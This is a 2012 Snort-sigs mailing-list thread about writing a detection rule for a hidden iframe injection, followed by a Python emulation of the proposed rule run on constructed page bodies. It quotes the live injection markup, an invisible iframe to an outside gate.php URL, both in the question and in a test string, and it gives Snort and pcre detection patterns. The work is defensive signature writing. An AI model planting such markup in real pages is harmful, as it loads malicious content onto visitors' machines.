[Snort-sigs] Rule thought

James Lay jlay at ...3266...
Mon Aug 6 15:29:25 EDT 2012


On 2012-08-06 12:27, lists at ...3397... wrote:
> On 08/06/12 13:13, James Lay wrote:
>> All,
>>
>> Recently (today) I ran into the below:
>>
>> 
>> <!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style>
>> <div class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi-->
>>
>> I've not seen an iframe injection that included a specified class
>> before.  My original draft rule looked like:
>>
>> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
>> (msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data;
>> pcre:"/<\/style><div class=[a-z]{9}><iframe src/i";
>> classtype:web-application-attack; sid:10000017; rev:1;)
>>
>> But this looks pretty expensive.  I'm sure there's a better way to
>> match this...would it be something like:
>>
>> content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe src";
>>
>> My question is how do I tell Snort to match all three consecutively?
>> I get that I could use within, but would that apply to the pcre?
>> Thanks for any advice.
>
> I think there's more of an abnormality around the unquoted URL in the
> iframe and I'm not certain the class will always be 9 characters, but
> assuming it is how about:
>
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
> (msg:"INDICATOR-COMPROMISE div tag with class preceding iframe to specific URL";
> flow:from_server,established; file_data; content:"<div class=";
> content:"<iframe src=http:"; fast_pattern; within:30;
> pcre:"/<div class=[a-z]{9}><iframe src=http[^\x3e]+\.php\?[a-z]=\d+\x20/";
> classtype:bad-unknown; sid:x; rev:1;)
>
> Just a thought...  Joel will probably want to add /smi ;)


Ah...I totally missed that...go me!  Thank you...this does help.

James
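The evaluation order the proposed rule depends on, as an added Python illustration that is neither Snort nor code posted in this thread: Snort evaluates content options in rule order, `within:N` is measured from the end of the previous content match (and Snort retries an earlier content if a later relative one fails), and a pcre without the `R` flag is searched over the whole buffer independently of the content chain, which answers the question of whether `within` applies to the pcre. The response bodies below are constructed for the example; only the injection itself is taken from the thread, with the wrapped `<div` / `class=` joined by a space as the rule assumes.

```python
"""Emulate the content/within/pcre chain of the proposed Snort rule.

Added illustration, not Snort and not code from the mailing-list thread.
It models three Snort behaviours: content options are evaluated in order;
`within:N` requires the next content to end within N bytes after the end
of the previous content match (with backtracking to later occurrences of
earlier contents); a pcre without the R flag runs over the whole buffer.
All sample bodies are constructed, not captured traffic.
"""
import re

# Content options in rule order: (pattern, within).  `None` = no relative modifier.
CONTENTS = [
    (b"<div class=", None),
    (b"<iframe src=http:", 30),
]

# The pcre from the proposed rule.  No R flag, so it is not anchored to the
# content chain; Snort only evaluates it once the content options matched.
PCRE = re.compile(rb"<div class=[a-z]{9}><iframe src=http[^\x3e]+\.php\?[a-z]=\d+\x20")


def content_chain(buf: bytes, contents=CONTENTS, start: int = 0) -> bool:
    """True if every content matches in order, honouring `within` relative to
    the end of the previous match.  Retries later occurrences of a content
    when the rest of the chain fails, as Snort does."""
    if not contents:
        return True
    needle, within = contents[0]
    # With `within`, the match must end no later than `start + within` bytes.
    search_end = len(buf) if within is None else start + within
    idx = buf.find(needle, start)
    while idx >= 0 and idx + len(needle) <= search_end:
        if content_chain(buf, contents[1:], idx + len(needle)):
            return True
        idx = buf.find(needle, idx + 1)
    return False


def evaluate(buf: bytes) -> dict:
    """Run the rule body in Snort order: content chain, then (only if that
    matched) the non-relative pcre over the whole buffer."""
    chain = content_chain(buf)
    pcre = bool(PCRE.search(buf)) if chain else False
    return {"content_chain": chain, "pcre": pcre, "alert": chain and pcre}


# Constructed body carrying the injection quoted in the thread.
INJECTED = (
    b"<html><body><p>Welcome</p>"
    b"<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;"
    b"opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style>"
    b"<div class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673 "
    b"frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 "
    b"border=0></iframe></div><!--/qpi--></body></html>"
)

# Constructed legitimate page: quoted class, quoted src, iframe far from the div.
BENIGN = (
    b'<html><body><div class="content"><h1>News</h1><p>' + b"x" * 200 + b"</p>"
    b'<iframe src="https://player.example/embed?id=42"></iframe></div></body></html>'
)

# Constructed variant with a 10-letter class: the content chain still matches
# (10 + 1 + 17 bytes = 28, under within:30) but the pcre's fixed {9} does not.
TEN_LETTER = (
    b"<style>div.pofasdfhgx{}</style><div class=pofasdfhgx>"
    b"<iframe src=http://analitics3.in/gate.php?f=1003673 width=5></iframe></div>"
)

# Constructed body where the first "<div class=" is too far from the iframe and a
# second one is close: the chain only matches because it retries the later one.
BACKTRACK = (
    b"<div class=outer>" + b"y" * 100 + b"</div>"
    b"<div class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=7 ></iframe>"
)


if __name__ == "__main__":
    for name, body in [("injected", INJECTED), ("benign", BENIGN),
                       ("ten_letter", TEN_LETTER), ("backtrack", BACKTRACK)]:
        print(name, evaluate(body))
```

The ten-letter case is the point raised in the reply: the content chain and `within:30` tolerate a slightly longer class name, but the `[a-z]{9}` in the pcre does not, so the rule as written misses it.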